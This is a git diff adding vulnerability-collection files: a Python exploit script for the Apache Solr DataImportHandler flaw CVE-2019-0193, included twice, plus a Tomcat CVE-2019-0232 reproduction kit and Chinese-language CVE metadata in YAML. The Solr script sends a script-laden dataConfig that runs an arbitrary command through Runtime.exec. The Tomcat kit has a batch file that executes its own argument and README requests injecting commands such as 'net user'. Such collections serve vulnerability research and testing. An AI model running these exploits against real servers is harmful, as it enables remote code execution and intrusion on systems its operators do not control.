diff --git a/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.jpg b/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..aa875acf80c112f9f10a05dd45e6eda6dc45647c
Binary files /dev/null and b/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.jpg differ
diff --git a/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py b/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py
new file mode 100644
index 0000000000000000000000000000000000000000..d0f2a7b2f3d2848805171cb89e320a9e23b8cdf8
--- /dev/null
+++ b/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py
@@ -0,0 +1,92 @@
+import requests
+import json
+import sys
+
+
+banner = '''
+ _______ ________ ___ ___ __ ___ ___ __ ___ ____
+ / ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ / _ \/_ |/ _ \___ \
+ | | \ \ / /| |__ ______ ) | | | || | (_) |______| | | || | (_) |__) |
+ | | \ \/ / | __|______/ /| | | || |\__, |______| | | || |\__, |__ <
+ | |____ \ / | |____ / /_| |_| || | / / | |_| || | / /___) |
+ \_____| \/ |______| |____|\___/ |_| /_/ \___/ |_| /_/|____/
+
+ python By jas502n
+
+'''
+print banner
+
+def admin_cores(url, cmd):
+ core_selector_url = url + '/solr/admin/cores?_=1565526689592&indexInfo=false&wt=json'
+ r = requests.get(url=core_selector_url)
+ json_strs = json.loads(r.text)
+ if r.status_code ==200 and "responseHeader" in r.text:
+ print "\nHere Have %s Core_name Exit!\n" % str(len(json_strs['status']))
+ for core_selector in json_strs['status']:
+ jas502n_Core_Name = json_strs['status']['%s'%core_selector]['name']
+ print '\n>>>>The Core Name = %s' % jas502n_Core_Name
+ show_config(url,jas502n_Core_Name)
+ get_config_name(url,jas502n_Core_Name)
+ URLDataSource_Poc(url,jas502n_Core_Name,cmd)
+
+ else:
+ print "No core_selector Exit!"
+
+
+
+
+def show_config(url,jas502n_Core_Name):
+ config_url = url + "/solr/"+ jas502n_Core_Name +"/dataimport?_=1565530241159&command=show-config&indent=on&wt=json"
+ r1 = requests.get(config_url)
+
+ if r1.status_code ==200 and 'dataConfig' in r1.text:
+ print ">> config_url= %s"% config_url
+ print ">%s dataConfig Exit!" % jas502n_Core_Name
+ else:
+ print "dataConfig No Exit!"
+
+
+
+def get_config_name(url,jas502n_Core_Name):
+ get_config_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&command=status&indent=on&wt=json'
+ r2 = requests.get(get_config_url)
+ if r2.status_code ==200 and 'config' in r2.text:
+ print ">> get_config_url= %s" % get_config_url
+ r2_json = json.loads(r2.text)
+ r2_str = r2_json['initArgs']
+
+ print '>get_config_name= %s' % r2_str[1][1]
+
+ else:
+ print "Core Config Name No Exit!"
+
+
+
+def URLDataSource_Poc(url,jas502n_Core_Name,cmd):
+ debug_model_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&indent=on&wt=json'
+ payload = "command=full-import&verbose=false&clean=true&commit=true&debug=true&core=atom&dataConfig=%%3CdataConfig%%3E%%0A++%%3CdataSource+type%%3D%%22URLDataSource%%22%%2F%%3E%%0A++%%3Cscript%%3E%%3C!%%5BCDATA%%5B%%0A++++++++++function+poc()%%7B+java.lang.Runtime.getRuntime().exec(%%22%s%%22)%%3B%%0A++++++++++%%7D%%0A++%%5D%%5D%%3E%%3C%%2Fscript%%3E%%0A++%%3Cdocument%%3E%%0A++++%%3Centity+name%%3D%%22stackoverflow%%22%%0A++++++++++++url%%3D%%22https%%3A%%2F%%2Fstackoverflow.com%%2Ffeeds%%2Ftag%%2Fsolr%%22%%0A++++++++++++processor%%3D%%22XPathEntityProcessor%%22%%0A++++++++++++forEach%%3D%%22%%2Ffeed%%22%%0A++++++++++++transformer%%3D%%22script%%3Apoc%%22+%%2F%%3E%%0A++%%3C%%2Fdocument%%3E%%0A%%3C%%2FdataConfig%%3E&name=dataimport" % cmd
+ headers = {
+ "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
+ "Accept": "application/json, text/plain, */*",
+ "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
+ "Accept-Encoding":"gzip, deflate",
+ "Content-type":"application/x-www-form-urlencoded",
+ "X-Requested-With":"XMLHttpRequest",
+ "Referer":"http://%s/solr/" % url
+
+ }
+ r3 = requests.post(url = debug_model_url, data=payload,headers=headers)
+ print ">>>>> debug_model_url= %s" % debug_model_url
+ if r3.status_code ==200 and 'Requests' in r3.text:
+
+ print "Send Poc Success!"
+ else:
+ print "No Send Poc Success!"
+ print r3.text
+
+
+
+if __name__ == '__main__':
+ cmd = sys.argv[2]
+ url = sys.argv[1]
+ admin_cores(url,cmd)
diff --git a/cve/apache-solr/2019/CVE-2019-0193/README.md b/cve/apache-solr/2019/CVE-2019-0193/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..c4089bff912f20a42b27efdb52c547074cf39fc6
--- /dev/null
+++ b/cve/apache-solr/2019/CVE-2019-0193/README.md
@@ -0,0 +1,62 @@
+# CVE-2019-0193 Solr DataImport Handler RCE (RCE-Vuln < solr v8.12)
+
+
+### python usage
+
+`python CVE-2019-0193.py http://192.168.2.18:8983 "calc"`
+
+### URLDataSource_Poc
+
+
+
+```
+
+
+
+
+
+
+
+```
+
+### jdbc
+
+
+
+
+`D:\CVE\CVE-2019-0193\solr-7.7.2\server\solr-webapp\webapp\WEB-INF\lib\mysql-connector-java-5.1.48.jar`
+
+```
+
+
+
+
+
+
+
+
+```
+
+### 参考链接:
+https://mp.weixin.qq.com/s/typLOXZCev_9WH_Ux0s6oA
+
+https://mp.weixin.qq.com/s/diF7HOf3wuSjBeoIb7qLCA
+
diff --git a/cve/apache-solr/2019/CVE-2019-0193/python-CVE-2019-0193-poc.jpg b/cve/apache-solr/2019/CVE-2019-0193/python-CVE-2019-0193-poc.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..ad7c57a5d58a5fe9c89e59aff20b2ed5bd114342
Binary files /dev/null and b/cve/apache-solr/2019/CVE-2019-0193/python-CVE-2019-0193-poc.jpg differ
diff --git a/cve/apache-solr/2019/CVE-2019-0193/python-CVE-2019-0193.jpg b/cve/apache-solr/2019/CVE-2019-0193/python-CVE-2019-0193.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..9335021e72e223033049bacc1b0da8b464389ebe
Binary files /dev/null and b/cve/apache-solr/2019/CVE-2019-0193/python-CVE-2019-0193.jpg differ
diff --git a/cve/apache-solr/2019/CVE-2019-0193/solr_RCE.gif b/cve/apache-solr/2019/CVE-2019-0193/solr_RCE.gif
new file mode 100644
index 0000000000000000000000000000000000000000..6ac1f21965724e51abc5adac3b034c172449a700
Binary files /dev/null and b/cve/apache-solr/2019/CVE-2019-0193/solr_RCE.gif differ
diff --git a/cve/apache-solr/2019/yaml/CVE-2019-0193 b/cve/apache-solr/2019/yaml/CVE-2019-0193
new file mode 100644
index 0000000000000000000000000000000000000000..16d30f2d1c248b46cf1be91f5b04591df1df3c2d
--- /dev/null
+++ b/cve/apache-solr/2019/yaml/CVE-2019-0193
@@ -0,0 +1,19 @@
+id: CVE-2019-0193
+source: https://github.com/jas502n/CVE-2019-0193
+info:
+ name: Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。
+ severity: high
+ description:
+ 在Apache Solr中,DataImportHandler是一个可选但流行的模块,用于从数据库和其他来源提取数据,它具有整个DIH配置可以来自请求的“dataConfig”参数的功能。DIH 管理屏幕的调试模式使用它来方便地调试/开发 DIH 配置。由于 DIH 配置可以包含脚本,因此此参数存在安全风险。从 Solr 版本 8.2.0 开始,使用此参数需要将 Java 系统属性“enable.dih.dataConfigParam”设置为 true。
+ scope-of-influence:
+ Apache Solr < 8.2.0
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-0193
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.2
+ cve-id: CVE-2019-0193
+ cwe-id: CWE-94
+ cnvd-id: None
+ kve-id: None
+ tags: cve2019, Apache, Solr
diff --git a/cve/apache-tomcat/2019/CVE-2019-0232/README.md b/cve/apache-tomcat/2019/CVE-2019-0232/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..c47c7405abb839a6e1efcb1c9eb9dd75d634b2ff
--- /dev/null
+++ b/cve/apache-tomcat/2019/CVE-2019-0232/README.md
@@ -0,0 +1,64 @@
+#### Vulnerability Environment
+```
+Tomcat 8.5.39
+
+Jdk 8u121
+```
+
+#### Edit `web.xml` file
+```
+
+ cgi
+ org.apache.catalina.servlets.CGIServlet
+
+ debug
+ 0
+
+
+ cgiPathPrefix
+ WEB-INF/cgi-bin
+
+
+ executable
+
+
+ 5
+
+
+
+
+
+ cgi
+ /cgi-bin/*
+
+```
+
+#### Edit `content.xml` file
+```
+
+
+
+
+ WEB-INF/web.xml
+ ${catalina.base}/conf/web.xml
+
+
+
+
+```
+
+#### Create `hello.bat` file
+```
+echo Content-type: text/html //whatever the content in batch file
+```
+
+#### Move the directory `WEB-INF` to `$CATALINA_HOME/webapps/ROOT` and then restart tomcat server
+
+#### Send a request to the target tomcat server with Windows OS command injection
+```
+http://localhost:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Ccalc.exe
+
+http://localhost:8080/cgi-bin/hello.bat?&net+user
+```
diff --git a/cve/apache-tomcat/2019/CVE-2019-0232/WEB-INF/cgi-bin/hello.bat b/cve/apache-tomcat/2019/CVE-2019-0232/WEB-INF/cgi-bin/hello.bat
new file mode 100644
index 0000000000000000000000000000000000000000..c9601a16aca152a1a54a316ea6b319f0da0652c9
--- /dev/null
+++ b/cve/apache-tomcat/2019/CVE-2019-0232/WEB-INF/cgi-bin/hello.bat
@@ -0,0 +1,5 @@
+@echo off
+echo Content-Type: text/plain
+echo.
+set foo=%~1
+%foo%
\ No newline at end of file
diff --git a/cve/apache-tomcat/2019/CVE-2019-0232/WEB-INF/web.xml b/cve/apache-tomcat/2019/CVE-2019-0232/WEB-INF/web.xml
new file mode 100644
index 0000000000000000000000000000000000000000..fae48ddde0c4612bd96386709e0cdd252bf93cc8
--- /dev/null
+++ b/cve/apache-tomcat/2019/CVE-2019-0232/WEB-INF/web.xml
@@ -0,0 +1,31 @@
+
+
+
+
+
+ Welcome to Tomcat
+
+ Welcome to Tomcat
+
+
+
diff --git a/cve/apache-tomcat/2019/CVE-2019-0232/tomcat1.gif b/cve/apache-tomcat/2019/CVE-2019-0232/tomcat1.gif
new file mode 100644
index 0000000000000000000000000000000000000000..46a9c5ad6a0f64e4d88946527d3137ca9f359061
Binary files /dev/null and b/cve/apache-tomcat/2019/CVE-2019-0232/tomcat1.gif differ
diff --git a/cve/apache-tomcat/2019/yaml/CVE-2019-0232.yaml b/cve/apache-tomcat/2019/yaml/CVE-2019-0232.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..80afaf0bdd2e298ef96573afbaf2528dee5e76bc
--- /dev/null
+++ b/cve/apache-tomcat/2019/yaml/CVE-2019-0232.yaml
@@ -0,0 +1,21 @@
+id: CVE-2019-0232
+source: https://github.com/pyn3rd/CVE-2019-0232
+info:
+ name: Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。
+ severity: high
+ description: |
+ 在启用 enableCmdLineArguments 的 Windows 上运行时,Apache Tomcat 9.0.0.M1 到 9.0.17、8.5.0 到 8.5.39 和 7.0.0 到 7.0.93 中的 CGI Servlet 容易受到远程代码执行的攻击,因为 JRE 将命令行参数传递给 Windows 的方式存在错误。默认情况下,CGI Servlet 处于禁用状态。CGI 选项 enable CmdLineArguments 在 Tomcat 9.0.x 中默认处于禁用状态(默认情况下,为了响应此漏洞,将在所有版本中禁用)。有关 JRE 行为的详细说明,请参阅 Markus Wulftange 的博客(https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html)和此存档的 MSDN 博客 (https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/)。
+ scope-of-influence:
+ Apache Tomcat 7.0.0-7.0.93
+ Apache Tomcat 8.5.0-8.5.39
+ Apache Tomcat 9.0.1-9.0.17
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-0232
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.1
+ cve-id: CVE-2019-0232
+ cwe-id: CWE-78
+ cnvd-id: None
+ kve-id: None
+ tags: cve2019, Apache Tomcat
diff --git a/cve/apache/2019/CVE-2019-0193/CVE-2019-0193-Demo.mp4 b/cve/apache/2019/CVE-2019-0193/CVE-2019-0193-Demo.mp4
new file mode 100644
index 0000000000000000000000000000000000000000..aca9e95bd96b9f7618fd41e9731ae80765f7a96c
Binary files /dev/null and b/cve/apache/2019/CVE-2019-0193/CVE-2019-0193-Demo.mp4 differ
diff --git a/cve/apache/2019/CVE-2019-0193/CVE-2019-0193.jpg b/cve/apache/2019/CVE-2019-0193/CVE-2019-0193.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..aa875acf80c112f9f10a05dd45e6eda6dc45647c
Binary files /dev/null and b/cve/apache/2019/CVE-2019-0193/CVE-2019-0193.jpg differ
diff --git a/cve/apache/2019/CVE-2019-0193/CVE-2019-0193.py b/cve/apache/2019/CVE-2019-0193/CVE-2019-0193.py
new file mode 100644
index 0000000000000000000000000000000000000000..d0f2a7b2f3d2848805171cb89e320a9e23b8cdf8
--- /dev/null
+++ b/cve/apache/2019/CVE-2019-0193/CVE-2019-0193.py
@@ -0,0 +1,92 @@
+import requests
+import json
+import sys
+
+
+banner = '''
+ _______ ________ ___ ___ __ ___ ___ __ ___ ____
+ / ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ / _ \/_ |/ _ \___ \
+ | | \ \ / /| |__ ______ ) | | | || | (_) |______| | | || | (_) |__) |
+ | | \ \/ / | __|______/ /| | | || |\__, |______| | | || |\__, |__ <
+ | |____ \ / | |____ / /_| |_| || | / / | |_| || | / /___) |
+ \_____| \/ |______| |____|\___/ |_| /_/ \___/ |_| /_/|____/
+
+ python By jas502n
+
+'''
+print banner
+
+def admin_cores(url, cmd):
+ core_selector_url = url + '/solr/admin/cores?_=1565526689592&indexInfo=false&wt=json'
+ r = requests.get(url=core_selector_url)
+ json_strs = json.loads(r.text)
+ if r.status_code ==200 and "responseHeader" in r.text:
+ print "\nHere Have %s Core_name Exit!\n" % str(len(json_strs['status']))
+ for core_selector in json_strs['status']:
+ jas502n_Core_Name = json_strs['status']['%s'%core_selector]['name']
+ print '\n>>>>The Core Name = %s' % jas502n_Core_Name
+ show_config(url,jas502n_Core_Name)
+ get_config_name(url,jas502n_Core_Name)
+ URLDataSource_Poc(url,jas502n_Core_Name,cmd)
+
+ else:
+ print "No core_selector Exit!"
+
+
+
+
+def show_config(url,jas502n_Core_Name):
+ config_url = url + "/solr/"+ jas502n_Core_Name +"/dataimport?_=1565530241159&command=show-config&indent=on&wt=json"
+ r1 = requests.get(config_url)
+
+ if r1.status_code ==200 and 'dataConfig' in r1.text:
+ print ">> config_url= %s"% config_url
+ print ">%s dataConfig Exit!" % jas502n_Core_Name
+ else:
+ print "dataConfig No Exit!"
+
+
+
+def get_config_name(url,jas502n_Core_Name):
+ get_config_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&command=status&indent=on&wt=json'
+ r2 = requests.get(get_config_url)
+ if r2.status_code ==200 and 'config' in r2.text:
+ print ">> get_config_url= %s" % get_config_url
+ r2_json = json.loads(r2.text)
+ r2_str = r2_json['initArgs']
+
+ print '>get_config_name= %s' % r2_str[1][1]
+
+ else:
+ print "Core Config Name No Exit!"
+
+
+
+def URLDataSource_Poc(url,jas502n_Core_Name,cmd):
+ debug_model_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&indent=on&wt=json'
+ payload = "command=full-import&verbose=false&clean=true&commit=true&debug=true&core=atom&dataConfig=%%3CdataConfig%%3E%%0A++%%3CdataSource+type%%3D%%22URLDataSource%%22%%2F%%3E%%0A++%%3Cscript%%3E%%3C!%%5BCDATA%%5B%%0A++++++++++function+poc()%%7B+java.lang.Runtime.getRuntime().exec(%%22%s%%22)%%3B%%0A++++++++++%%7D%%0A++%%5D%%5D%%3E%%3C%%2Fscript%%3E%%0A++%%3Cdocument%%3E%%0A++++%%3Centity+name%%3D%%22stackoverflow%%22%%0A++++++++++++url%%3D%%22https%%3A%%2F%%2Fstackoverflow.com%%2Ffeeds%%2Ftag%%2Fsolr%%22%%0A++++++++++++processor%%3D%%22XPathEntityProcessor%%22%%0A++++++++++++forEach%%3D%%22%%2Ffeed%%22%%0A++++++++++++transformer%%3D%%22script%%3Apoc%%22+%%2F%%3E%%0A++%%3C%%2Fdocument%%3E%%0A%%3C%%2FdataConfig%%3E&name=dataimport" % cmd
+ headers = {
+ "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
+ "Accept": "application/json, text/plain, */*",
+ "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
+ "Accept-Encoding":"gzip, deflate",
+ "Content-type":"application/x-www-form-urlencoded",
+ "X-Requested-With":"XMLHttpRequest",
+ "Referer":"http://%s/solr/" % url
+
+ }
+ r3 = requests.post(url = debug_model_url, data=payload,headers=headers)
+ print ">>>>> debug_model_url= %s" % debug_model_url
+ if r3.status_code ==200 and 'Requests' in r3.text:
+
+ print "Send Poc Success!"
+ else:
+ print "No Send Poc Success!"
+ print r3.text
+
+
+
+if __name__ == '__main__':
+ cmd = sys.argv[2]
+ url = sys.argv[1]
+ admin_cores(url,cmd)
diff --git a/cve/apache/2019/CVE-2019-0193/README.md b/cve/apache/2019/CVE-2019-0193/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..c4089bff912f20a42b27efdb52c547074cf39fc6
--- /dev/null
+++ b/cve/apache/2019/CVE-2019-0193/README.md
@@ -0,0 +1,62 @@
+# CVE-2019-0193 Solr DataImport Handler RCE (RCE-Vuln < solr v8.12)
+
+
+### python usage
+
+`python CVE-2019-0193.py http://192.168.2.18:8983 "calc"`
+
+### URLDataSource_Poc
+
+
+
+```
+
+
+
+
+
+
+
+```
+
+### jdbc
+
+
+
+
+`D:\CVE\CVE-2019-0193\solr-7.7.2\server\solr-webapp\webapp\WEB-INF\lib\mysql-connector-java-5.1.48.jar`
+
+```
+
+
+
+
+
+
+
+
+```
+
+### 参考链接:
+https://mp.weixin.qq.com/s/typLOXZCev_9WH_Ux0s6oA
+
+https://mp.weixin.qq.com/s/diF7HOf3wuSjBeoIb7qLCA
+
diff --git a/cve/apache/2019/CVE-2019-0193/python-CVE-2019-0193-poc.jpg b/cve/apache/2019/CVE-2019-0193/python-CVE-2019-0193-poc.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..ad7c57a5d58a5fe9c89e59aff20b2ed5bd114342
Binary files /dev/null and b/cve/apache/2019/CVE-2019-0193/python-CVE-2019-0193-poc.jpg differ
diff --git a/cve/apache/2019/CVE-2019-0193/python-CVE-2019-0193.jpg b/cve/apache/2019/CVE-2019-0193/python-CVE-2019-0193.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..9335021e72e223033049bacc1b0da8b464389ebe
Binary files /dev/null and b/cve/apache/2019/CVE-2019-0193/python-CVE-2019-0193.jpg differ
diff --git a/cve/apache/2019/CVE-2019-0193/solr_RCE.gif b/cve/apache/2019/CVE-2019-0193/solr_RCE.gif
new file mode 100644
index 0000000000000000000000000000000000000000..6ac1f21965724e51abc5adac3b034c172449a700
Binary files /dev/null and b/cve/apache/2019/CVE-2019-0193/solr_RCE.gif differ
diff --git a/cve/apache/2019/yaml/CVE-2019-0193.yaml b/cve/apache/2019/yaml/CVE-2019-0193.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..b9af4c21e28fa1d34762c85770a145948f4f71cd
--- /dev/null
+++ b/cve/apache/2019/yaml/CVE-2019-0193.yaml
@@ -0,0 +1,20 @@
+id: CVE-2019-0193
+source:
+ - https://github.com/jas502n/CVE-2019-0193
+info:
+ name: Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。
+ severity: high
+ description: 在Apache Solr中,DataImportHandler是一个可选但流行的模块,用于从数据库和其他来源提取数据,它具有整个DIH配置可以来自请求的“dataConfig”参数的功能。DIH 管理屏幕的调试模式使用它来方便地调试/开发 DIH 配置。由于 DIH 配置可以包含脚本,因此此参数存在安全风险。从 Solr 版本 8.2.0 开始,使用此参数需要将 Java 系统属性“enable.dih.dataConfigParam”设置为 true。
+ scope-of-influence:
+ Apache Slor < 8.2.0
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-0193#range-6854850
+
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.2
+ cve-id: CVE-2019-0193
+ cwe-id: CWE-94
+ cnvd-id: None
+ kve-id: None
+ tags: cve2019, Apache,Solr
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index e348ad077a31411bdce499c500ea5c64cd291a07..fc49cadd072bfed150b0cdc61afbbd9762a3bd46 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -21,6 +21,7 @@ cve:
- CVE-2022-29885
- CVE-2020-9484
- CVE-2020-1938
+ - CVE-2019-0232
apache-Spark:
- CVE-2022-33891
apache-Flink: